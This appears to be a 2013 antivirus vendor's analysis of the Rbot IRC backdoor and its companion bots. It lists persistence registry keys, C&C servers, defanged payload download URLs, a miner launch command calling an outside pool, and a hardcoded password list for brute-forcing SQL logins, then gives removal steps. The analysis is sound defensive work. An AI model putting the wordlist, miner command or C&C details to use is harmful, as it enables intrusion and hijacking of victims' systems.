Rbot

by Alexander Saprykin on July 17th, 2013 in Malware Descriptions.

Platform: Win32
Type: Backdoor
Size: 340974 bytes
Packer: unknown
Unpacked size: 639 Kb
Language: C++
MD5: df2436b584808064ddf4788b04f215f3
SHA1: 69c65c7e75d275fd8d0783d84d50cd7d6933d335
Aliases: Trojan.Win32.Ircbrute, Backdoor:Win32/Rbot, Backdoor.Win32.DarkKomet

Summary

Rbot is a Trojan program which allows an attacker remote access to the compromised system. Rbot is a component of "rundat.exe" downloaded by another malicious program Blazebot from FTP server:

jayne.p0rn-lover.us:8989

File compilation date is 30.06.2013:

During the investigation, the "rundat.exe" was downloaded with the following MD5 hashes:

7d6a4a7924bccc6537fc643e2f956c36 is detected as Trojan.Win32.Ircbrute by Ad-Aware Antivirus. Compilation date is 19.06.2013.

c7c7345bb0c0e14a9b6b937fc7ebb2fd is detected as Trojan.Win32.Generic!BT. Compilation date is 07.07.2013.

cb46ce95ad089c540b4e02daeb192e6f is detected as Trojan.Win32.Ircbrute. Compilation date is 04.07.2013.

The last "rundat.exe" file modification was received from the FTP server, MD5: ef484d123cecaa3744774187dd120164. Compilation date is 15.07.2013, almost no files are detected:

All files have identical functionality. To evade detection by antivirus programs, attackers use the Mutation Engine and periodically upload updates for the backdoor executable file.

Technical Details

Installation

Once activated, the backdoor copies itself to the system folder under a randomly generated name:

%System%\<rnd>.exe

Date and time set for the backdoor copy is the same as for the "explorer.exe" file.

"Read-only" and "Hidden" attributes are then applied to the file.

To be automatically launched upon each Windows startup the backdoor adds a link to its executable file in the system registry keys:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "%System%\<rnd>.exe"

 [HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "<rnd>.exe"

 [HKLM\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "<rnd>.exe"

 [HKLM\Software\Microsoft\yOLE]
"Supports RAS Connections" = "<rnd>.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "%System%\<rnd>.exe"

 [HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" ="<rnd>.exe"

 [HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "<rnd>.exe" 

[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "<rnd>.exe"

where <rnd> is a random sequence of the Latin alphabet letters (for example, "bjxfdcz" or "jqoglul").

Payload

To ensure the uniqueness of the malware process’ name, the Trojan creates a unique identifier with the following name:

LIQUID

The backdoor connects to the IRC server:

videos.p0rn-lover.us:6667

Once connected to the server, the backdoor uses a specially created NICK which depends on the locale of the compromised system, random digits which depend on the amount of time passed since the system startup, and the availability of the window with the "mIRC" class name on the system.

Once successfully connected to the C&C server, the backdoor joins the following channel to receive commands:

#fkyou#

The server is located in the United States:

When the description was created, the backdoor received commands to download another malicious program:

The file is downloaded from the following URL:

hxxp://www.dropbox.com/s/eysw6hxovddeau5/nn.exe?dl=1

The file is 262736 bytes in size, MD5: 04d32029a7e277222a5c48c432b23b26. It is a malicious program known as NrgBot. It is detected by Ad-Aware Antivirus as Worm.Win32.Dorkbot, compilation date is 04.07.2013.

The downloaded file is then saved to the root Windows folder under the name "system.exe":

%WinDir%\system.exe

Once successfully downloaded, the file is launched for execution.

While investigating, the C&C server sent commands to download NrgBot malware using the following URLs:

hxxp://www.dropbox.com/s/a4gaze3j44i5b19/n.exe?dl=1
hxxp://www.dropbox.com/s/3oqkk0kmn11qo52/n.exe?dl=1

The file is 243488 bytes in size, MD5:e9de715aebb1724efb666b68682e17b2 and is detected by Ad-Aware Antivirus as Worm.Win32.Dorkbot. Compilation date is 04.07.2013.

hxxps://www.dropbox.com/s/7j355a8pnz8fbcm/nr.exe?dl=1

The file is 263760 bytes in size, MD5:9cef91d3c589d3221ba4a382cdd8eefa, is detected by Ad-Aware Antivirus as Worm.Win32.Dorkbot. Compilation date is 09.07.2013.

Mutation Engine use allows attackers to effectively evade antivirus detections:

The backdoor performs the following actions following attacker’s commands:

  • Start a remote shell and run commands.
  • Send SYN flood to the target system. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to the target system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
  • Send ACK flood to the target system. A denial of service attack that sends a large number of TCP packets with the ACK flag set to a target.
  • Download the other malicious program.
  • Redirect TCP traffic.
  • Upload files through FTP.
  • End threads.
  • Launch TFTP server.
  • Perform a DNS look-up.
  • Send clipboard data.
  • Visit URLs specified by an attacker.
  • Delete files specified by an attacker.
  • Scan for ports on the network.
  • Send e-mail.
  • Send network configuration information.
  • Send thread list.
  • Send clipboard data.
  • Perform commands specified by an attacker using Internet Relay Chat client mirc, if it is installed on the compromised system.
  • Delete its body using a file of the command interpreter which is saved to the current user's Windows temporary folder under the following name:

%Temp%<rnd1>sdel.bat

where <rnd> is a random sequence of the Latin alphabet letters.

  • The backdoor also listens on TCP port 113 which is required by some IRC servers.

This backdoor may also attempt to connect to SQL servers by attempting to log in using commonly used passwords. Once connected, it may instruct the server to download and run a copy of itself via TFTP.

Below is a list of frequently used logins and passwords which are hardcoded in the malware.

Logins:

administrator
administrador
administrateur
administrat
admins
admin
staff
root
computer
owner
student
teacher
wwwadmin
guest
default
database
dba
oracle
db2

Passwords:

administrator
administrador
administrateur
administrat
admins
admin
adm
password1
password
passwd
pass1234
pass
pwd
007
1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890
2000
2001
2002
2003
2004
test
guest
none
demo
unix
linux
changeme
default
system
server
root
null
qwerty
mail
outlook
web
www
internet
accounts
accounting
home
homeuser
user
oem
oemuser
oeminstall
windows
win98
win2k
winxp
winnt
win2000
qaz
asd
zxc
qwe
bob
jen
joe
fred

bill
mike
john
peter
luke
sam
sue
susan
peter
brian
lee
neil
ian
chris
eric
george
kate
bob
katie
mary
login
loginpass
technical
backup
exchange
fuck
bitch
slut
sex
god
hell
hello
domain
domainpass
domainpassword
database
access
dbpass
dbpassword
databasepass
data
databasepassword
db1
db2
db1234
sa
sql
sqlpassoainstall
orainstall
oracle
ibm
cisco
dell
compaq
siemens
hp
nokia
xp
control
office
blank
winpass
main
lan
internet
intranet
student
teacher
staff

Nrgbot

Nrgbot downloaded by the backdoor is saved to the "%WinDir%\system.exe" file and after launch connects to the same IRC server:

It then joins the following channel:

#nrz#

and receives commands to download files to the compromised computer:

Files are downloaded from the following URLs:

hxxp://www.dropbox.com/s/z2bevmalyco39ap/rep.exe?dl=1

The file is 234576 bytes in size, MD5: b027d16320803018b0602c1d32a09570, detected by Ad-Aware Antivirus as Trojan.Win32.Generic!BT. Compilation date is 07.07.2013. It is a malware, Blazebot:

hxxp://www.dropbox.com/s/6etxnj97npjpyq8/van.exe?dl=1

The file is 661869 bytes in size, MD5:02d0587c38f896e07a5cd351c04dbcb, detected by Ad-Aware Antivirus as Trojan.Win32.Generic!BT. Compilation date is 09.06.2012. The program is designed to generate bitcoins.

The files are then saved to the current user's Windows temporary under a randomly generated name:

%AppData%\<rnd2>.exe

where <rnd2> is a random hexadecimal digit.

A module to generate bitcoins is installed to the following hidden folder:

%WinDir%\system\critical\btc.il (151652 bytes)
%WinDir%\system\critical\phatk.ptx (206858 bytes)
%WinDir%\system\critical\phatk.cl (9741 bytes)
%WinDir%\system\critical\system.exe (54784 bytes)
%WinDir%\system\critical\usft_ext.dll (939264 bytes)
%WinDir%\system\critical\btc-evergreen.il (84967 bytes)
%WinDir%\system\critical\antivirus.bat (79 bytes)
%WinDir%\system\critical\miner.dll (340992 bytes)
%WinDir%\system\critical\guicomp.dll (33792 bytes)
%WinDir%\system\critical\sys.bat (345 bytes)
%WinDir%\system\critical\nircmd.exe (43520 bytes)
%WinDir%\system\critical\coinutil.dll (29184 bytes)

It is launched with a command:

system.exe -o hxxp://hitmanuk_pran:123@coin.odin-valhall.com:8332 -g yes -I 100

This causes CPU usage to increase:

To automatically launch the bitcoin generator, the following key is created:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Update" = "C:\Windows\system\critical\antivirus.bat

A description of Rbot generated by our automated malware analysis system can be found here.

Conclusion

Three IRC bots: Rbot, Nrgbot, Blazebot are apparently under the control of the same operator. Following attacker’s commands, Rbot downloads Nrgbot. In turn, Nrgbot downloads Blazebot. Blazebot downloads Rbot. Thus, each IRC bot downloads a bot being controlled by an attacker. Bots help each other to keep the system permanently infected. Attackers use the Mutation Engine to generate new versions of malicious programs which complicates the removal of three IRC bots at a time from the compromised system.

Two C&C servers have been detected from which commands can be received by Nrgbot (channel #nrz#), Rbot(channel #fkyou# ), Blazebot (channel ##TBT), and auto-join channel "#Security-Check" for all bots:

178.33.232.15
146.82.5.222

Using Internet Relay Chat client Mirc and being connected to C&C servers, it is possible to track the current commands bots receive. When the description was created, the same commands were received from two servers:

When the description was created, a link to download a module for generating bitcoins was received in the "#Security-Check" channel.

Below is a scheme how the bots work:


Removal Recommendations

  1. Follow recommendations to remove Nrgbot and Blazebot without restarting PC.
  2. Delete parameters of the registry keys("How to Work with System Registry"):
  3. [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "%System%\<rnd>.exe"

    [HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKLM\SYSTEM\CurrentControlSet\Control\Lsa]
    "Supports RAS Connections" = "<rnd>.exe" 

    [HKLM\Software\Microsoft\yOLE]
    "Supports RAS Connections" = "<rnd>.exe" 

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "%System%\<rnd>.exe" 

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
    "Supports RAS Connections" ="<rnd>.exe" 

    [HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
    "Supports RAS Connections" = "<rnd>.exe" 

    [HKCU\Software\Microsoft\yOLE]
    "Supports RAS Connections" = "<rnd>.exe" 

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    Windows Update" = "C:\Windows\system\critical\antivirus.bat 

  4. Reboot the computer.
  5. Delete the following files:
  6. %System%\<rnd>.exe
    %WinDir%\system.exe
    %AppData%\<rnd2>.exe
    %WinDir%\system\critical\btc.il
    %WinDir%\system\critical\phatk.ptx
    %WinDir%\system\critical\phatk.cl
    %WinDir%\system\critical\system.exe
    %WinDir%\system\critical\usft_ext.dll
    %WinDir%\system\critical\btc-evergreen.il
    %WinDir%\system\critical\antivirus.bat
    %WinDir%\system\critical\miner.dll
    %WinDir%\system\critical\guicomp.dll
    %WinDir%\system\critical\sys.bat
    %WinDir%\system\critical\nircmd.exe
    %WinDir%\system\critical\coinutil.dll

  7. Delete the original malware file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).
  8. Clean the Temporary Internet Files folder, which contains infected files ("How to clean Temporary Internet Files folder").
  9. Run a full scan of your computer using the Antivirus program with the updated definition database ("Download Ad-Aware Free").